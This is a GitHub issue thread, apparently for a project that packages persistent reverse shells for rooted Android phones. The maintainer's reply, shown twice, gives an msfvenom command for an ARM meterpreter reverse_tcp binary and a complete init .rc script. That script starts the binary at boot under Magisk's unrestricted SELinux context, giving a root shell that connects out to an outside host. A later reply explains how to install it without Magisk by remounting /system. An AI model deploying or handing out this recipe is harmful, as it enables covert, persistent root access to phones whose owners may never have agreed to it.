Open gabriel-maxx opened 10 months ago
Hi, thanks for your interest to the project.
The msfvenom
is a cli tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any linux OS, but it is already conveniently embedded into Kali. -p linux/armle/meterpreter/reverse_tcp
is a type of payload - reverse shell, tcp, for Linux OS and ARM CPUs, -f elf
is a file format - linux binary executable. So, when it ran it will connect to the LHOST
host on LPORT
port (you must control this host and have a listener waiting there for connection), and you will get a shell to the target device.
The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (/system/bin/revshell
), that are available system-wide, and then run it as a daemon when the OS loads. To run it as the daemon you have to make an init script (.rc script in case of Android, think of it as a systemd script in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:
service revshell /system/bin/revshell
disabled
seclabel u:r:magisk:s0
shutdown critical
on property:sys.boot_completed=1
start revshell
So create file /system/etc/init/revshell.rc
on your smartphone with the content above and it will automatically be executed by init process during system load. The stuff in this sctipt is:
service revshell /system/bin/revshell
- pretty much self explainatory. It is a definition of your system service in format service SERVICE_NAME PATH_TO_SERVICE_BINARY
.
disabled
- is the marker that tells that service is disabled by default, but conditions of its start is simply described below (on property:sys.boot_completed
). The idea is to not start the service until the system and other services are fully booted, just in case to make sure everythings be smooth, no missing mounts etc.
seclabel u:r:magisk:s0
- it is a definition of a SELinux context that needs to be set on your service process. That's the most critical part. The Magisk injects a special SELinux context for itself to run its own daemon (magiskd
), and this context is "allmighty", it has absolutely zero restrictions in the system, technically magiskd spawns new processes with shells for you when you call su
with this exact context. If you will not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start revshell service from the init process context
shutdown critical
- this line tell to consider this service critical for the system. It is not sctrictly necessary but adds some minor benefits, so why not?
Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.
The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create /system/etc/init/revshell.rc file for your with all the content and put it into the /system.
Hope it helps, sorry for a long answer
Hi, thanks for your interest to the project.
The
msfvenom
is a cli tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any linux OS, but it is already conveniently embedded into Kali.-p linux/armle/meterpreter/reverse_tcp
is a type of payload - reverse shell, tcp, for Linux OS and ARM CPUs,-f elf
is a file format - linux binary executable. So, when it ran it will connect to theLHOST
host onLPORT
port (you must control this host and have a listener waiting there for connection), and you will get a shell to the target device.The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (
/system/bin/revshell
), that are available system-wide, and then run it as a daemon when the OS loads. To run it as the daemon you have to make an init script (.rc script in case of Android, think of it as a systemd script in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:service revshell /system/bin/revshell disabled seclabel u:r:magisk:s0 shutdown critical on property:sys.boot_completed=1 start revshell
So create file
/system/etc/init/revshell.rc
on your smartphone with the content above and it will automatically be executed by init process during system load. The stuff in this sctipt is:
service revshell /system/bin/revshell
- pretty much self explainatory. It is a definition of your system service in formatservice SERVICE_NAME PATH_TO_SERVICE_BINARY
.disabled
- is the marker that tells that service is disabled by default, but conditions of its start is simply described below (on property:sys.boot_completed
). The idea is to not start the service until the system and other services are fully booted, just in case to make sure everythings be smooth, no missing mounts etc.seclabel u:r:magisk:s0
- it is a definition of a SELinux context that needs to be set on your service process. That's the most critical part. The Magisk injects a special SELinux context for itself to run its own daemon (magiskd
), and this context is "allmighty", it has absolutely zero restrictions in the system, technically magiskd spawns new processes with shells for you when you callsu
with this exact context. If you will not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start revshell service from the init process contextshutdown critical
- this line tell to consider this service critical for the system. It is not sctrictly necessary but adds some minor benefits, so why not?Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.
The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create /system/etc/init/revshell.rc file for your with all the content and put it into the /system.
Hope it helps, sorry for a long answer
Thanks for the explanation but my problem is that I've tried everything and I can't install magisk on my phone. I think my model is incompatible but I have root access and so I would like to know is it possible to do this without magisk, just with root access?
Hm, perhaps I didn't understand you properly. So your problem is that you already have root but do not have magisk? Is that some multimedia device? Or an emulator?
Technically, you can install this binary and service script into your system, but you have to make sure that there are no working system integrity measures, like verified boot and dm-verity. If there are none, then just remount your partition or make a mount overlay to add new files to your system fs.
However, I must warn you, if there are some measures then you device might be bricked after you write new files to /system. Please be cautious. I cannot give you any advice, you have to understand risks and investigate that yourself
Hi could you tell me something if I have a rooted android device then how do I:
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f elf -o revshell
I copy the revshell binary to /system/bin/ and then I create a revshell.rc script and copy it to /system/etc/init/
but explain to me what the content of this rc script would look like? What do I have to put inside for it to work?